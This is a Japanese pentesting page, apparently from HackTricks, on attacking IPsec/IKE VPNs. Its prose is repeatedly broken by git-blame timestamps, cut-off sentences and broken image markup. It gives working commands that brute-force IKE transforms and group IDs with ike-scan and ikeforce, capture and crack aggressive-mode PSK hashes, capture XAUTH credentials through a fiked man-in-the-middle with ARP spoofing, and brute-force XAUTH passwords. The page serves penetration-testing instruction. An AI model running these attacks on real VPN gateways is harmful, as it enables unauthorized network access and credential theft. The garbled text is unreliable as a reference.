2023-08-30 09:57:15 +00:00
# 500/udp - IPsec/IKE VPNのペンテスト
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:15 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-03-26 15:55:19 +00:00
< summary > < strong > htARTE( ) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > でAWSハッキングをゼロからヒーローまで学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-05-05 23:08:22 +00:00
HackTricksをサポートする他の方法:
2024-02-05 03:25:08 +00:00
2024-05-05 23:08:22 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )で**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**してください。
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:15 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2024-03-14 23:41:41 +00:00
**Try Hard Security Group**
2024-05-05 23:08:22 +00:00
< figure > < img src = "../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:41:41 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2023-08-30 09:57:15 +00:00
## 基本情報
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
**IPsec**は、ネットワーク間( )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
2つのポイント間での**セキュリティアソシエーション( )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
* **フェーズ1:** 2つのエンドポイント間に安全なチャネルが作成されます。これは、Pre-Shared Key( )
* **フェーズ1.5:** このフェーズは必須ではありませんが、拡張認証フェーズとして知られ、接続しようとしているユーザーの身元を確認するためにユーザー名とパスワードを要求します。
* **フェーズ2:** このフェーズは、**ESP**と**AH**を使用してデータを保護するためのパラメータを交渉することに専念しています。フェーズ1とは異なるアルゴリズムの使用を許可し、**Perfect Forward Secrecy (PFS)**を確保してセキュリティを強化します。
2020-07-15 15:43:14 +00:00
2024-02-08 22:31:36 +00:00
**デフォルトポート:** 500/udp
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
## nmapを使用してサービスを**Discover**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
2023-08-30 09:57:15 +00:00
## **有効な変換を見つける**
2020-07-15 15:43:14 +00:00
2024-03-26 15:55:19 +00:00
IPSecの構成は、1つまたは複数の変換を受け入れるように準備することができます。変換は値の組み合わせです。**各変換**には、DESまたは3DESのような**暗号化アルゴリズム**、SHAまたはMD5のような**整合性アルゴリズム**、事前共有キーを**認証タイプ**として含み、Diffie-Hellman 1または2を鍵**配布アルゴリズム**として、28800秒を**寿命**として含みます。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
その後、最初に行う必要があるのは、**有効な変換を見つける**ことです。これにより、サーバーがあなたと通信できるようになります。これを行うために、**ike-scan**ツールを使用できます。デフォルトでは、Ike-scanはメインモードで動作し、ISAKMPヘッダーと**8つの変換を含む単一の提案**を持つパケットをゲートウェイに送信します。
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
応答に応じて、エンドポイントに関する情報を取得できます。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
2023-07-07 23:42:27 +00:00
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
2020-07-15 15:43:14 +00:00
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
2024-05-05 23:08:22 +00:00
前の応答で見ると、**AUTH**というフィールドがあり、値が**PSK**になっています。これは、VPNが事前共有キーを使用して構成されていることを意味します( )
2023-07-07 23:42:27 +00:00
**最後の行の値も非常に重要です:**
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
* _0 returned handshake; 0 returned notify:_ これは、ターゲットが**IPsecゲートウェイでない**ことを意味します。
2024-03-26 15:55:19 +00:00
* _**1 returned handshake; 0 returned notify:**_ これは、**ターゲットがIPsecに構成され、IKEネゴシエーションを実行する意向があり、提案された変換のいずれかが受け入れ可能である**ことを意味します(有効な変換は出力に表示されます)。
2024-05-05 23:08:22 +00:00
* _0 returned handshake; 1 returned notify:_ VPNゲートウェイは、**受け入れ可能な変換がない場合**に通知メッセージで応答します(ただし、一部のゲートウェイは応答しない場合もあり、その場合はさらなる分析と改訂提案が試されるべきです)。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
したがって、この場合、すでに有効な変換がありますが、3番目の場合は、**少しブルートフォースして有効な変換を見つける必要があります:**
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
まず、すべての可能な変換を作成する必要があります:
2020-07-15 15:43:14 +00:00
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
2024-03-26 15:55:19 +00:00
そして、ike-scanを使用してそれぞれをブルートフォース攻撃します( )
2020-07-15 15:43:14 +00:00
```bash
while read line; do (echo "Valid trans found: $line" & & sudo ike-scan -M $line < IP > ) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
2024-05-05 23:08:22 +00:00
もしブルートフォース攻撃がうまくいかない場合、サーバーがハンドシェイクなしで正当な変換に対して応答している可能性があります。その場合、同じブルートフォース攻撃を行うが、アグレッシブモードを使用してみることができます:
2020-07-15 15:43:14 +00:00
```bash
while read line; do (echo "Valid trans found: $line" & & ike-scan -M --aggressive -P handshake.txt $line < IP > ) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
2024-05-05 23:08:22 +00:00
Hopefully **有効な変換がエコーバックされます** 。\
You can try the **same attack** using [**iker.py** ](https://github.com/isaudits/scripts/blob/master/iker.py ).\
You could also try to brute force transformations with [**ikeforce** ](https://github.com/SpiderLabs/ikeforce ):
2020-07-15 15:43:14 +00:00
```bash
2021-11-24 16:49:46 +00:00
./ikeforce.py < IP > # No parameters are required for scan -h for additional help
2020-07-15 15:43:14 +00:00
```
2024-05-05 23:08:22 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
**DH Group: 14 = 2048-bit MODP** および **15 = 3072-bit** \
**2 = HMAC-SHA = SHA1 (この場合)**。`--trans` フォーマットは $Enc,$Hash,$Auth,$DH です。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
シスコは、DH グループ 1 と 2 の使用を避けるように指示しています。これらは強力ではないため、**リソースが豊富な国々**は、これらの弱いグループを使用するデータの暗号化を簡単に解読できると専門家は信じています。これは、それらを素早く解読するために準備する特別な方法を使用して行われます。この方法を設定するのに多額の費用がかかりますが、これにより、これらの強力な国々が、暗号化されたデータをリアルタイムで読むことができます(
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:15 +00:00
### サーバーのフィンガープリント
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
次に、ike-scan を使用して、デバイスの **ベンダーを特定**しようとすることができます。このツールは初期提案を送信し、リプレイを停止します。その後、サーバーから受信したメッセージと一致する応答パターンとの **時間差** を **分析** することで、ペンテスターは VPN ゲートウェイのベンダーを正確にフィンガープリントすることができます。さらに、一部の VPN サーバーは IKE でオプションの **Vendor ID (VID) ペイロード** を使用します。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
必要に応じて有効な変換を指定します(`--trans` を使用)
2020-07-15 15:43:14 +00:00
2024-03-14 23:41:41 +00:00
IKE がベンダーを特定した場合、それを表示します:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
2023-07-07 23:42:27 +00:00
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
2020-07-15 15:43:14 +00:00
IKE Backoff Patterns:
2023-07-07 23:42:27 +00:00
2020-07-15 15:43:14 +00:00
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
2023-07-07 23:42:27 +00:00
2020-07-15 15:43:14 +00:00
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
2024-05-05 23:08:22 +00:00
これはnmapスクリプト_**ike-version**_でも実現できます。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:15 +00:00
## 正しいID( )
2020-07-15 15:43:14 +00:00
2024-03-26 15:55:19 +00:00
ハッシュをキャプチャするためには、アグレッシブモードをサポートし、正しいID( )
2024-02-05 03:25:08 +00:00
そのために、2つの方法をお勧めします:
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
### ike-scanを使用したIDの総当たり攻撃
2020-07-15 15:43:14 +00:00
2024-03-14 23:41:41 +00:00
まず、ハッシュを収集しようとして偽のIDでリクエストを行うことを試してください( )
2020-07-15 15:43:14 +00:00
```bash
ike-scan -P -M -A -n fakeID < IP >
```
2024-05-05 23:08:22 +00:00
もし**ハッシュが返されない**場合、おそらくこの総当たり攻撃の方法が機能するでしょう。**何らかのハッシュが返された場合、それは偽のIDに対して偽のハッシュが返されるため、この方法はIDを総当たり攻撃するために信頼性がない**ことを意味します。例えば、偽のハッシュが返される可能性があります(これは最新バージョンで発生します):
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
しかし、私が言ったように、ハッシュが返されない場合は、ike-scanを使用して一般的なグループ名を総当たり攻撃する必要があります。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
このスクリプトは**可能なIDを総当たりで試み、有効なハンドシェイクが返されるID( )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
特定の変換を発見した場合は、ike-scanコマンドに追加してください。複数の変換を発見した場合は、すべてを試す新しいループを追加してください( )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
[ikeforceの辞書 ](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic )または[seclistsの辞書](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt)を使用して、一般的なグループ名を総当たり攻撃することができます。
2020-07-15 15:43:14 +00:00
```bash
2021-01-18 14:24:10 +00:00
while read line; do (echo "Found ID: $line" & & sudo ike-scan -M -A -n $line < IP > ) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
2020-07-15 15:43:14 +00:00
```
2024-02-05 03:25:08 +00:00
### IDのBruteforce with Iker
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
[**iker.py** ](https://github.com/isaudits/scripts/blob/master/iker.py )は**ike-scan**を使用して、可能なグループ名をBruteforceします。**ike-scan**の出力に基づいて、有効なIDを見つけるために独自の方法に従います。
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
### IDのBruteforce with ikeforce
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
[**ikeforce.py** ](https://github.com/SpiderLabs/ikeforce )は、**IDをBruteforceするために使用できるツール**です。このツールは、**有効なIDと無効なIDを区別するために使用できるさまざまな脆弱性を悪用しようとします**( )
2020-07-15 15:43:14 +00:00
2024-02-09 12:54:39 +00:00
デフォルトでは、**ikeforce**は最初にいくつかのランダムなIDを送信して、サーバーの動作をチェックし、使用するタクティクを決定します。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
* **最初の方法**は、Ciscoシステムの情報**Dead Peer Detection DPD**を**検索**して、グループ名をBruteforceすることです( )
* 利用可能な**2番目の方法**は、**各試行に送信された応答の数を確認する**ことです。なぜなら、正しいIDが使用されるときには、より多くのパケットが送信されることがあるからです。
2024-03-26 15:55:19 +00:00
* **3番目の方法**は、不正なIDに対する応答で**"INVALID-ID-INFORMATION"を検索**することです。
* 最後に、サーバーがチェックに対して何も応答しない場合、**ikeforce**はサーバーをBruteforceし、正しいIDが送信されるとサーバーがいくつかのパケットで応答するかどうかを確認します。\
2024-05-05 23:08:22 +00:00
明らかに、IDをBruteforceする目的は、有効なIDがわかったときに**PSK**を取得することです。その後、**ID**と**PSK**を使用して、XAUTHをBruteforceする必要があります( )
2021-10-18 11:21:18 +00:00
2024-05-05 23:08:22 +00:00
特定の変換を発見した場合は、ikeforceコマンドに追加してください。複数の変換を発見した場合は、すべてを試すための新しいループを自由に追加してください( )
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
```
```bash
./ikeforce.py < IP > -e -w ./wordlists/groupnames.dic
```
2024-03-09 13:37:50 +00:00
### スニッフィングID
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
(From the book **Network Security Assessment: Know Your Network** ): VPNクライアントとサーバー間の接続をスニッフィングすることで、クライアントIDを含む最初のアグレッシブモードパケットがクリアテキストで送信されるため、有効なユーザー名を取得することも可能です
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2024-03-09 13:37:50 +00:00
## ハッシュのキャプチャとクラック
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
最後に、**有効な変換**と**グループ名**が見つかり、**アグレッシブモードが許可されている**場合、破られる可能性のあるハッシュを簡単に取得できます:
2020-07-15 15:43:14 +00:00
```bash
ike-scan -M -A -n < ID > --pskcrack=hash.txt < IP > #If aggressive mode is supported and you know the id, you can get the hash of the passwor
```
2024-03-24 12:35:04 +00:00
ハッシュは_hash.txt_内に保存されます。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
**psk-crack**、**john**(
2021-01-18 14:26:55 +00:00
```bash
2022-01-12 14:33:12 +00:00
psk-crack -d < Wordlist_path > psk.txt
2020-07-15 15:43:14 +00:00
```
2023-08-30 09:57:15 +00:00
## **XAuth**
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
**アグレッシブモードIKE** は、**事前共有キー( ) ( )
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
**IKEv2** に移行すると、ユーザーの認証の目的で**XAuth**の代わりに**EAP( )
2024-02-08 22:31:36 +00:00
### ローカルネットワークのMitMによる資格情報のキャプチャ
2024-05-05 23:08:22 +00:00
したがって、_fiked_ を使用してログインデータをキャプチャし、デフォルトのユーザー名があるかどうかを確認できます( `fiked` にリダイレクトする必要があります。これはARPスプーフィングを使用して行うことができます、[詳細情報](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/))
2021-01-18 14:26:55 +00:00
```bash
2020-07-15 15:43:14 +00:00
fiked -g < IP > -k testgroup:secretkey -l output.txt -d
```
2024-05-05 23:08:22 +00:00
### IPSecを使用してMitM攻撃を試み、ポート500へのすべてのトラフィックをブロックし、IPSecトンネルを確立できない場合はトラフィックがクリアで送信されるかもしれません。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
**ikeforce**を使用して**XAUTH**のユーザー名とパスワードをブルートフォース攻撃する
2024-03-24 12:35:04 +00:00
2024-05-05 23:08:22 +00:00
有効なグループ名**id**と**psk**を知っている場合、ユーザー名またはユーザー名のリストとパスワードのリストを使用できます:
2021-01-18 14:26:55 +00:00
```bash
2020-07-15 15:43:14 +00:00
./ikeforce.py < IP > -b -i < group_id > -u < username > -k < PSK > -w < passwords.txt > [-s 1]
```
2024-05-05 23:08:22 +00:00
この方法では、ikeforce はユーザー名:パスワードの各組み合わせを使用して接続を試みます。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
1つ以上の有効なトランスフォームが見つかった場合は、前の手順と同様に使用してください。
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
## IPSEC VPN での認証
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
Kali では、IPsec トンネルを確立するために **VPNC** が利用されます。**プロファイル** は `/etc/vpnc/` ディレクトリに配置する必要があります。これらのプロファイルは _**vpnc**_ コマンドを使用して開始できます。
2024-02-05 03:25:08 +00:00
2024-05-05 23:08:22 +00:00
以下のコマンドと設定は、VPNC を使用して VPN 接続を設定するプロセスを示しています。
2024-02-05 03:25:08 +00:00
```bash
root@system:~# cat > /etc/vpnc/samplevpn.conf < < STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
2020-07-15 15:43:14 +00:00
IKE Authmode psk
2024-02-05 03:25:08 +00:00
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
2020-07-15 15:43:14 +00:00
STOP
2024-02-05 03:25:08 +00:00
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
2020-07-15 15:43:14 +00:00
```
2024-03-26 15:55:19 +00:00
```markdown
2024-05-05 23:08:22 +00:00
In this setup:
2024-02-05 03:25:08 +00:00
2024-05-05 23:08:22 +00:00
* Replace `[VPN_GATEWAY_IP]` with the actual IP address of the VPN gateway.
* Replace `[VPN_CONNECTION_ID]` with the identifier for the VPN connection.
* Replace `[VPN_GROUP_SECRET]` with the VPN's group secret.
* Replace `[VPN_USERNAME]` and `[VPN_PASSWORD]` with the VPN authentication credentials.
* `[PID]` symbolizes the process ID that will be assigned when `vpnc` initiates.
2024-02-05 03:25:08 +00:00
2024-05-05 23:08:22 +00:00
Ensure that actual, secure values are used to replace the placeholders when configuring the VPN.
2024-02-05 03:25:08 +00:00
2024-05-05 23:08:22 +00:00
## Reference Material
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
* [PSK cracking paper ](http://www.ernw.de/download/pskattack.pdf )
2020-07-15 15:43:14 +00:00
* [SecurityFocus Infocus ](http://www.securityfocus.com/infocus/1821 )
2024-02-05 03:25:08 +00:00
* [Scanning a VPN Implementation ](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf )
* Network Security Assessment 3rd Edition
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:15 +00:00
## Shodan
2020-10-05 13:59:40 +00:00
* `port:500 IKE`
2022-04-28 16:01:33 +00:00
2024-03-14 23:41:41 +00:00
**Try Hard Security Group**
2024-05-05 23:08:22 +00:00
< figure > < img src = "../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:41:41 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
2023-08-30 09:57:15 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-03-26 15:55:19 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2024-02-05 03:25:08 +00:00
2024-03-26 15:55:19 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-03-26 15:55:19 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-05-05 23:08:22 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-03-26 15:55:19 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-26 15:55:19 +00:00
```
